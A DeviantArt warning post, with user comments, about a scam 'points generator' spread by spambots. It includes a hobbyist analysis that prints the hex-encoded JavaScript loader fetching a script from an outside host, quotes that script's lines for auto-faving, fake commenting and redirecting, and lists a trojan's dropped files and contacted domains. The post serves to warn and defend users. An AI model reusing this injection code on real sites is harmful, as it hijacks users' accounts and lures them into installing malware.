HOME | DD
#bot #points #spam #troll #spambot
Published: 2013-04-28 12:38:00 +0000 UTC; Views: 17693; Favourites: 109; Downloads: 0
Redirect to original
Description
Update April, 29: All spam accounts from last weekend have been deleted by DA staff.But new spam accounts have been opened. Please report them to the Help Desk and/or leave a comment here or on petersong's page .
Copied from here:
petersong.deviantart.com/art/S…
Before you do anything stupid, please read this
Obviously, this offer is swindling.
And as such it is dangerous for you !
table of contents
- What it does
- And then what ?
- What can we do ?
- "I installed it, but I'm okay"
- "OMG my brother did it !"
- I did not download/run that exe file, am I safe ?
- Connected Viruses/Malware/Adware identified
- Personal investigations
- Updates
- There was no harmful code in the JavaScript stuff that I saw, but it can change at any time
- Any reasonable browser should not be able to execute a downloaded file without warning you before (and the "plugin" stuff is AFAIK only fake div displayed as part of the internet webpage, then not harmful)
- I think that the only thing really endangered by the JavaScript is your session cookie, then changing you password might be wise.
- I have heard of other more sophisticated attacks like buffer overflowing and stuff, but I'm not competent enough to tell you if there is such a threat. Then consider you are not safe until someone can tell us whether there is such a potential threat.
- Trojan
- Identified by Emsisoft as Trojan.MSIL.Spy.Agent.AMN (A)
- Identified by Fortinet as MSIL/Agent.HG!tr.spy
- Identified by ESET-NOD32 as a variant of MSIL/Spy.Agent.HG
- Identified by many other malware detectors as Trojan.GenericKD.966175
- This is a serious threat
- This is a Trojan, which means it is a malicious software spying your computer and sending (or giving access to) this data to malicious people. See the Internet Holy Bible for reference.
- Some antivirus are free. See the Mighty Source of all Truth for reference.
- Fresh news here thanks to ~ krisiskiller101 investigations !
- He was able to get rid of it using MalwareBYTES
- He confirmed that RASMan service was up on his computer. Though, this service is not supposed to be harmful and might have been up before. It might also be part of the trojan attack that was not turned back up by the fix because it is not harmful alone.
- Thanks for the info !
- AdWare.iBryte.H
- seems to be a recent version of wellknown adware iBryte
- Only comodo antimalware seems to identify it. Maybe ESET-NOD32 too.
- Be very careful as searching for "iBryte.H removal" can lead to spywareprotectiontool.com which is a malicious website giving you malware instead of solutions
- You can find instructions for this adware removal, searching for "iBryte removal", but I don't know if they would work with this version of the adware (please, tell us if you have any success with one of these procedure)
- Optimum Installer (fs)
- Might be a wrong positive
- There is plenty of removal instruction tutorials (please, tell us if you have any success with one of them)
- It mess up your registry in a theatrical way
- It probably affects the download manager associated with your web browser
- It probably affects the toolbars in your web browser
- Writes 'test' everywhere in the registry
- Mess up with your ie cache
- Creates files
- Create an executable file named "D2M-Precheck.exe", hidden in "C:\Document and settings\Your_User_Name\Local Settings\Temp"
- Create an executable file named "check_offer_rp.dll", hidden in "C:\Document and settings\Your_User_Name\Local Settings\Temp"
- Create copies of these two files in a subdirectory of "C:\Document and settings\Your_User_Name\Local Settings\Temporary Internet Files\Content.IE5\"
- Runs the created exe file, which in turn spoils your computer :
- Creates a new "exe" file named "Impressioner.exe" along with a "System.Data.SQLite.dll" and "imp.dat" files, hidden at the same place : "C:\Document and settings\Your_User_Name\Local Settings\Temp"
- Transfers data through internet with following addresses
- imp.oi-imp1.com
- config.oi-config1.com
- d1uc4fr8hoy8ts.cloudfront.net
- cdn.install.oibundles2.com (the only thing done here is downloading the dll file stated before)
- cache-download.real.com
- d2m.adk-mobile.com
- app-bucks.com
- app-caster.com
- ns20.real.com
- ns30.real.com
- ns40.real.com
- ns-01.cloudfront.net
- ns-02.cloudfront.net
- nsgtm01.ak-networks.com
- nsgtm02.ak-networks.com
- nsgtm03.ak-networks.com
- scenic-screensavers.com
- ns7.markmonitor.com
- ns6.markmonitor.com
- ns2.markmonitor.com
- ns4.markmonitor.com
- ns5.markmonitor.com
- ns3.markmonitor.com
- ns1.markmonitor.com
- Probably displays advertising
- There is at least 2 scripts, now : mix.js and nr.js (second one only fav without leaving a comment)
- There is at least two messages spreading this sh*t
- It seems I was totally wrong thinking that infected people were spreading those messages. It is more probably bots registering and posting every x seconds
What it does
"\x61" is just another way to write "a" (ISO hexadecimal encoding)
Thus,
["\x73\x72\x63","\x73\x63\x72\x69\x70\x74","\x63\x72\x65\x61\x74\x65\x45\x6C\x65\x6D\x65\x6E\x74","\x61\x70\x70\x65\x6E\x64\x43\x68\x69\x6C\x64","\x62\x6F\x64\x79","\x68\x74\x74\x70\x3A\x2F\x2F\x64\x65\x76\x69\x61\x6E\x74\x61\x72\x74\x2E\x68\x70\x2E\x61\x66\x2E\x63\x6D\x2F\x67\x65\x6E\x65\x72\x61\x74\x6F\x72\x2F\x6D\x69\x78\x2E\x6A\x73"]
is just written words. Script actually.
You can have it safely translated by using the "unescape" Javascript function, on this part of the script only.
Once translated, this script does one thing : it includes a bigger, more elaborated script as being part of the DA page.
This script can be found here :
deviantart.hp.af.cm/generator/…
This script will now be able to act in your name
Note that this script is NOT hosted by deviantart.com website. It is a foreign website, hosted in Cameroon (Africa), in such a way that the smugglers can't be found by regular simple investigations. They are hiding, and hiding well.
This new script does something else.
For now (but it might change) :
document.getElementById("gmi-ResourceViewFaveButton").click();
It simulates click on the "Fave" button.
document.getElementById("commentbody").value="It actually works! Wohoooooooo! Thanks!";
It writes (in your name) a fake comment saying "It actually works! Wohoooooooo! Thanks!".
setTimeout("document.getElementsByClassName('ll f')[0].click()", 100);
It programs something that will hide this actions by reopening the comment area once it is posted.
document.getElementsByClassName("smbutton smbutton-blue smbutton-big comment-submit")[0].click();
It validates the comment (in you name).
window.top.location.href='deviantart.hp.af.cm/generator' ;
alert('DeviantART: Welcome to deviantART\'s Points Generator! You will be redirected to our generator. Click OK to proceed')
It programs a redirection to their website and displays an alert that says "DeviantART: Welcome to deviantART\'s Points Generator! You will be redirected to our generator. Click OK to proceed"
And then what ?
And then you wont get any DA points, indeed. I bet you guessed yet…
Instead, they will say to you "Oh, you don't have this so great plugin, come and download it !", launch the download anyway. And this is where you get screwed if you are gullible enough to run an executable file from a random site hidden in Cameroon…
I don't know (yet) what this exe file does. But I know what it could do.
First of it might be (and probably is) a security breach on your computer. Trojan, virus, remote agent…
Which in turn could be aimed at several things : spreading this publication so that other get screwed, stealing personal information (such as payment card numbers), using your computer as a proxy for networks attacks…
If you already downloaded the file, please, be very careful. Use antiviral detection and malware removal on your computer now, and in a few days. Firewall protection is a must have.
The malware might steal your "cookie" too. This means that your password might be compromised. Actually not only for deviantArt.
What can we do ?
For now, we can try to warn and inform people.
Try to make them stop spreading this stupid hoax.
If you have any idea of what more to do, please, comment.
"I installed it, but I'm okay"
Are you so very sure of this ? FYI, virustotal.com ran a virus detection on the exe file using 45 antivirus and states that only 3 of the 45 antivirus he tested found a threat.
Report can be found here : see the virustotal report
Now, do as you want.
"OMG my brother did it !"
I did not download/run that exe file, am I safe ?
As far as I know
Thus I would say that as far as I know, you should be relatively safe, but I also know that this is a huge field and that I'm no pro. So you should consider being careful, and having antiviral + firewall protection up to date on your computer (as everyone else).
Connected Viruses/Malware/Adware identified
One or several of these malwares might have been dropped on you computer if you had this exe file run on your computer :
Personal investigations
I don't have a packed solution. And I won't probably have time enough to investigate thoroughly this stuff.
Yet, I found some hints, by diving modestly into this sh*t. I share it for people that it might help.
This program does the following :
Be careful : this is not an exhaustive list. And all that is listed above is not necessarily harmful (e.g. SQLite.dll is just a database they use, not a virus itself, probably). Do not edit your Registry if you don't know exactly what you are doing.
Moreover, I have no idea on what this "impressioner.exe" does. Then there might be a lot more mess to clean. By the way, if you were infected and are able to find this file, please, consider sending a copy of it to me.
-edit- Okay, it will be hard to find this file on your drive : this file "does something" (including turning up RASMAN Service) and deletes itself. This is really not comforting.
This said, and with no guarantee of any kind, "do it at your own risks" and stuff, I think that you can safely delete the exe and dll files mentioned above. It might get you rid of part of the infection.
If you have more information or if you can teach me something on this kind of investigations, please, contact me, I will update.
This information might even be wrong depending on your OS and configuration !
Updates
Thank for reading.
Related content
Comments: 139
Lilyas In reply to ??? [2017-01-01 19:40:42 +0000 UTC]
DON'T DO THAT! Never give your password to anyone for any reason! It's fake.
👍: 1 ⏩: 1
Azriina In reply to Lilyas [2017-01-23 14:51:00 +0000 UTC]
I know its fake right!?????? They just do this for lies!!!!
👍: 1 ⏩: 0
TabbyLitter16 [2016-11-29 10:06:45 +0000 UTC]
please give me 1500 so that i can pay for an adopt.
👍: 0 ⏩: 0
Minty-Wintershine [2016-09-05 06:27:35 +0000 UTC]
noriko31997.deviantart.com/ is this a scammer?
👍: 0 ⏩: 1
SnowPea888 [2016-04-12 11:44:23 +0000 UTC]
OMG EVERY SINGLE STUPID DAY, A PERSON(changes person and website everyday) POSTS THAT DAILY AND APPEARS IN MY RECOMMENDED! I have their username: JessicaBoweman
👍: 0 ⏩: 0
cutecrochetNL [2016-04-09 20:21:42 +0000 UTC]
F--R--E--E--P--O--I--N--T--SF=R=E=E=== P=O=I=N=T=S:VISIT
.
www.pointsfreebies.tumblr.com
.
.
F=R=E=E=== P=O=I=N=T=S:VISIT
.
www.pointsfreebies.tumblr.com
.
.
F=R=E=E=== P=O=I=N=T=S:VISIT
.
www.pointsfreebies.tumblr.com This is a spammerrrrr
👍: 0 ⏩: 0
YouveGotNoIdea [2016-02-03 14:13:12 +0000 UTC]
time to go on a searching spree for #SpamBots . I doubt I'll get any luck, but if I do I'll get you a link.
also either there's a bug with my client, or this was a 2013-2015 issue. I spotted one yesterday.
👍: 0 ⏩: 2
Lilyas In reply to YouveGotNoIdea [2016-02-09 15:21:33 +0000 UTC]
This one is old. I don't know if there are current issues.
👍: 0 ⏩: 1
YouveGotNoIdea In reply to Lilyas [2016-02-09 20:55:54 +0000 UTC]
I realize this, but.. I swear I saw a few bots over a span of at least three to seven days. dA must've already deleted them
👍: 0 ⏩: 0
YouveGotNoIdea In reply to YouveGotNoIdea [2016-02-03 14:14:09 +0000 UTC]
found one! nebumav.deviantart.com/
👍: 0 ⏩: 0
Silkwolf24 [2015-08-25 23:56:22 +0000 UTC]
I almost fell for this! Thanks for the information about this stuff, it really helps!
👍: 0 ⏩: 1
Project-SCARY0PASTA [2015-04-11 03:46:01 +0000 UTC]
Don't know who this is / was.... but hopefully it's gone. I read this thing and was really angry that someone would do that.... there are many bad people in the world, and that bot / person is one of them. Thank you for posting this, and have a great day / night.... I appreciate you posting this.
👍: 0 ⏩: 0
GraphicsGail [2013-06-28 22:25:43 +0000 UTC]
A few weeks ago I was about to do it and realized it was too good to be true so it was a scam.
👍: 0 ⏩: 0
KaylaFoxeh [2013-06-28 14:49:39 +0000 UTC]
This is nuts! All this virus talk reminds me of the chain virus attack I had once... Uggggggh it wasnt pretty. It was so bad, I even had intusive advertising without being connected to the internet because that can contain a virus attack.. disconnecting from the internet and stuff. Took me 3 days to contain and deatroy it all. But this.. takes the cake. It is really terrifying
👍: 0 ⏩: 0
TheDreamingHawk [2013-06-23 23:13:58 +0000 UTC]
They returned AGAIN. I can't get why most spambots come from barren areas. (Like panama and cameroon). I wish DA could install a "Are you human?" Thing where you are forced to choose yes or no to make them stop.
👍: 0 ⏩: 0
CustardAndPie [2013-05-17 00:52:55 +0000 UTC]
[link]
They're back. . . . and I managed to catch FOUR IN A ROW yet again.
👍: 0 ⏩: 1
Lilyas In reply to CustardAndPie [2013-05-17 02:32:56 +0000 UTC]
DA filters became quite fast lately. It seems they are gone already - for now.
👍: 0 ⏩: 1
CustardAndPie In reply to Lilyas [2013-05-17 23:14:49 +0000 UTC]
Let's hope the scammers go out. . . and STAY out.
👍: 0 ⏩: 0
cannonstar17 [2013-05-16 21:22:54 +0000 UTC]
New account spam account alert!: ~burntinstant [link]
👍: 0 ⏩: 0
Dshere [2013-05-11 21:19:49 +0000 UTC]
nevermind, just answered my own question, he's using appfog still which at his link shows a page telling you to install "VIO flash player!" and the page itself insists that it is a "DA points generator"
Reported his link to Appfog myself, it'll be a dead link when they get to it.
👍: 0 ⏩: 0
Dshere [2013-05-11 21:09:17 +0000 UTC]
I've been away, anyone notice if it is still using appfog to shorten a URL?
Appfog has antispam policy and will delete the link the spammer uses, you just need to flag them to the link he uses.
👍: 0 ⏩: 0
xxJMXPxx [2013-05-11 07:28:34 +0000 UTC]
The spambots are now 'dedicating' (I think) their works to a specific member in DA. I checked the names put in there and they are real DA members... hopefully, they wouldn't fall for it because of their wrong grammar.
👍: 0 ⏩: 1
Lilyas In reply to xxJMXPxx [2013-05-11 13:33:44 +0000 UTC]
Basically it has nothing to do with the members their names they use in the title. They just needed to find a new routine to bypass DA's filter.
👍: 0 ⏩: 1
Lilyas In reply to sugarislife28 [2013-05-11 03:10:00 +0000 UTC]
Just keep on reporting. They are gone soon....
👍: 0 ⏩: 1
Skelettaa [2013-05-10 00:28:18 +0000 UTC]
Got more at it again! D=
[link] and [link]
I swear at this rate, DA should NOT let new accounts be created until they can find a better way to stop/avoid these.
👍: 0 ⏩: 0
xReDMemory [2013-05-09 20:23:21 +0000 UTC]
I don't get how it benefits these people who create bots to spam this.
👍: 0 ⏩: 1
Lilyas In reply to xReDMemory [2013-05-09 20:59:41 +0000 UTC]
They lure you to scam pages where they steal your data or make you buy stuff whatsoever...
👍: 0 ⏩: 1
Skelettaa [2013-05-03 22:23:37 +0000 UTC]
Ugh, got 2 taken care of just to see another one pop up! D= [link]
👍: 0 ⏩: 0
| Next =>